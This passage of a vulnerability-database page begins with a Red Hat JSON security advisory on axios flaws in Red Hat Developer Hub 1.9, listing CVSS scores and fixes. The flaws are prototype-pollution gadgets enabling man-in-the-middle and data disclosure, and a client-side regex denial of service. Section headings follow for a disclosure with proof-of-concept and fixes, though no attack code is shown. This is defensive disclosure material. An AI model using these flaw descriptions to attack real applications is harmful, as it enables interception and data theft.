      "release_date": "2026-06-11T15:32:03.155000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Man-in-the-Middle (MITM) attack via Prototype Pollution"
    },
    {
      "cve": "CVE-2026-44495",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-06-11T17:00:53.999811+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2487937"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client. This vulnerability involves prototype pollution gadgets in the request configuration processing. If another vulnerability has already polluted the Object.prototype.transformResponse, affected Axios versions may incorrectly interpret this inherited value as part of the request configuration or as an option validator. Axios does not itself create the prototype pollution. Exploitability requires a separate prototype-pollution vulnerability or equivalent attacker control over Object.prototype before Axios creates a request.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Information disclosure due to prototype pollution vulnerability",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-44495"
        },
        {
          "category": "external",
          "summary": "RHBZ#2487937",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2487937"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-44495",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44495"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44495",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44495"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-3g43-6gmg-66jw",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-3g43-6gmg-66jw"
        }
      ],
      "release_date": "2026-06-11T15:33:12.433000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Information disclosure due to prototype pollution vulnerability"
    },
    {
      "cve": "CVE-2026-44496",
      "cwe": {
        "id": "CWE-1333",
        "name": "Inefficient Regular Expression Complexity"
      },
      "discovery_date": "2026-06-11T17:01:15.856386+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2487943"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios. A remote attacker, by influencing the XSRF cookie name in a browser environment, could cause the application to construct a regular expression that leads to excessive processing. This can result in a client-side Denial of Service (DoS), where the affected browser tab may freeze, impacting the availability of the application for the user.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Client-side Denial of Service via unescaped regex metacharacters in XSRF cookie name",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-44496"
        },
        {
          "category": "external",
          "summary": "RHBZ#2487943",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2487943"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-44496",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44496"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44496",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44496"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-hfxv-24rg-xrqf",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-hfxv-24rg-xrqf"
        }
      ],
      "release_date": "2026-06-11T15:34:28.492000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Client-side Denial of Service via unescaped regex metacharacters in XSRF cookie name"
    }
  ]
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-44494 (GCVE-0-2026-44494)

FKIE_CVE-2026-44494

GHSA-35JP-WW65-95WH

Vulnerability Disclosure: Full Man-in-the-Middle via Prototype Pollution Gadget in config.proxy

Summary

CWE

CVSS 3.1

Why This Bypasses mergeConfig

Usage of "Helper" Vulnerabilities

Proof of Concept

1. The Setup (Simulated Pollution)

2. The Gadget Trigger (Safe Code)

3. The Execution

4. The Impact (Full MITM)

5. Verified PoC Code

Verified PoC Output

Impact Analysis

Why This Is More Severe Than transformResponse (axios_26)

Recommended Fix

Fix 1: Use hasOwnProperty when reading security-sensitive config properties

Fix 2: Enumerate all properties not in defaults and apply hasOwnProperty

Fix 3: Use null-prototype object for merged config

Resources

Timeline

RHSA-2026:26234

Tags

Sightings

Nomenclature

Vulnerability Disclosure: Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`

Fix 1: Use `hasOwnProperty` when reading security-sensitive config properties

Fix 2: Enumerate all properties not in defaults and apply `hasOwnProperty`